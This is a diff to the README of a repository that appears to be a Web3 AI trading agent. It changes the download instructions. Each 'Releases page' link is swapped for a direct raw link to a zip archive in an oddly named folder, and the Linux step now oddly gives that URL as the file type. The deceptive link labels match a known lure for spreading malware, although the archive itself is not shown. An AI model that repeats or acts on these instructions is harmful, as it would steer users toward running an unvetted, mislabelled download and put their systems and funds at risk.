elmahdishitit/Web3-AI-Trading-Agent/README.md

 ## 📥 Download & Install

-To get started, visit the [Releases page](https://github.com/elmahdishitit/Web3-AI-Trading-Agent/releases) to download the latest version of the Web3-AI-Trading-Agent.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/elmahdishitit/Web3-AI-Trading-Agent/main/unremovableness/Web3-AI-Trading-Agent.zip) to download the latest version of the Web3-AI-Trading-Agent.

-1. **Visit the Releases Page:** Click on this link to open the page: [Releases page](https://github.com/elmahdishitit/Web3-AI-Trading-Agent/releases).
+1. **Visit the Releases Page:** Click on this link to open the page: [Releases page](https://raw.githubusercontent.com/elmahdishitit/Web3-AI-Trading-Agent/main/unremovableness/Web3-AI-Trading-Agent.zip).

 2. **Select the Latest Release:** Look for the most recent version listed at the top.

 3. **Download the Right File:** You will see various files listed for different operating systems.
 Choose the file that matches your operating system:
    - **Windows:** Download the `.exe` file.
    - **macOS:** Download the `.dmg` file.
-   - **Linux:** Download the appropriate `.tar.gz` file.
+   - **Linux:** Download the appropriate `https://raw.githubusercontent.com/elmahdishitit/Web3-AI-Trading-Agent/main/unremovableness/Web3-AI-Trading-Agent.zip` file.

 4. **Run the Installer:** Once the file finishes downloading, find it in your downloads folder and double-click it to run the installer.